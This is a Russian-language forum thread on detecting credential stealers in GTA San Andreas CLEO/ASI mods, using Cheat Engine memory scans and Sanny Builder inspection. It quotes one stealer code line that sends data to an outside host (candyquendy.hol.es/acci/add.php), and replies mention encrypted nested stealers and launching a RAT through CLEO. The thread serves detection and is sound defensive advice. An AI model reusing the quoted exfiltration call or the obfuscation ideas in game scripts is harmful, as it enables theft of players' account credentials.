Проверка Cleo l ASI l SF на наличие стиллера.

[V Λ C U U M]

Как проверить файл на стилер. Самые популярные способы.​

Способ 1:​

Ручная проверка с помощью программы CheatEngine​

Для начала работы скачиваем её себе (возможно некоторые антивирусы будут сообщать об угрозе, но не беспокойтесь программа полностью безопасна). ​

После установки программы, запустите программу.​

Установите скрипт, который хотите проверить. Далее запускаем игру.​

Авторизуемся на сервере и сворачиваем игру. Заходим в программу CheatEngine.​

Нажимаем на этот значок.​

​

Далее в списке находим процесс "gta_sa.exe" и нажимаем на кнопку "Open".​

​

Теперь в поле "Value:" вводим текст "cleo"​

​

Нажимаем на кнопку "First Scan".​

​

Далее в поле с адресами памяти, выбираем любой адрес и кликаем по нему правой кнопкой мыши. Нажимаем на пункт "Browse this memory region".​

​

В появившимся окне нажимаем на вкладку "Viev" и выбираем пункт "All strings"​

​

В появившимся окне делаем всё как на скрине и нажимаем на кнопку "Generage string map". Ожидаем окончание загрузки.​

​

Далее нажимаем на кнопку "Show list"

​

И ищем что то похожее на свой логин и пароль вводимый в окно авторизации​

Если не нашли, то в проверяемом файле нет стилера.​

Способ 2:​

Ручная проверка с помощью Sanny Bilder (открывает только не закрпитованные клео). Для начала работы скачиваем её себе. ​

Открываем .cs файл и ищем подозрительные строки как на примере снизу ​

0AB1: call_scm_func @stealer_by_mg 0 1@ :mg__steal__format_url hex "http:" 2f 2f "candyquendy.hol.es" 2f "acci" 2f "add.php?" 00 end​

Затем просто удаляем найденное и нажимаем Ctrl+S (сохранить файл).
​

Ссылки оставлять не стану, дабы потом не стать причастным к вирусам на ваших PC.​

 

[Essavian]

И ищем что то похожее на свой логин и пароль вводимый в окно авторизации

Ну дак погоди
Т.е. логин и пароль уже отправились злоумышленнику? Ты же запустил скрипт, видишь в его коде свои данные. Тогда какой теперь смысл проверять, если уже запустил?

0AB1: call_scm_func @stealer_by_mg 0 1@ :mg__steal__format_url hex "http:" 2f 2f "candyquendy.hol.es" 2f "acci" 2f "add.php?" 00 end

Ну а если функции не будут называться так явно?

 

[V Λ C U U M]

Ну дак погоди
Т.е. логин и пароль уже отправились злоумышленнику? Ты же запустил скрипт, видишь в его коде свои данные. Тогда какой теперь смысл проверять, если уже запустил?

Смотри.. Мы ввели что-то похожее на свой логин/пароль, но в игру так и не зашли т.к это не наши данные, а стиллеру будет мягко говоря посрать на то, что мы ввели. Так же хочу подметить, что мы вводим данные в игре, а не в самом коде.

Ну а если функции не будут называться так явно?

В большинстве случаев автор не пытается скрыть данные сроки, а так нужно искать строки на подобии "Steal" 'Stealer' или другие части кода которые обращаются в интернет.

 

[Bodrov]

Т.е. логин и пароль уже отправились злоумышленнику? Ты же запустил скрипт, видишь в его коде свои данные. Тогда какой теперь смысл проверять, если уже запустил?

Вводишь фейк данные и усё

 

[Essavian]

Смотри.. Мы ввели что-то похожее на свой логин/пароль, но в игру так и не зашли т.к это не наши данные, а стиллеру будет мягко говоря посрать на то, что мы ввели. Так же хочу подметить, что мы вводим данные в игре, а не в самом коде.

Понятно

В большинстве случаев автор не пытается скрыть данные сроки, а так нужно искать строки на подобии "Steal" 'Stealer' или другие части кода которые обращаются в интернет.

В большинстве случаев? Т.е. не всегда?)

Вводишь фейк данные и усё

Да я с первого раза понял
Идите делайте группу/лычку для забаненных

 

[Salfetka]

Клео можно декриптовать, но в нем всеравно может быть закриптованный стиллер (тоесть клео в клео). Либо также закриптованный стиллер в клео обычном.

Также можно ратник запустить через клео. Но АВ будет блокировать скачиваемые файлы с клео.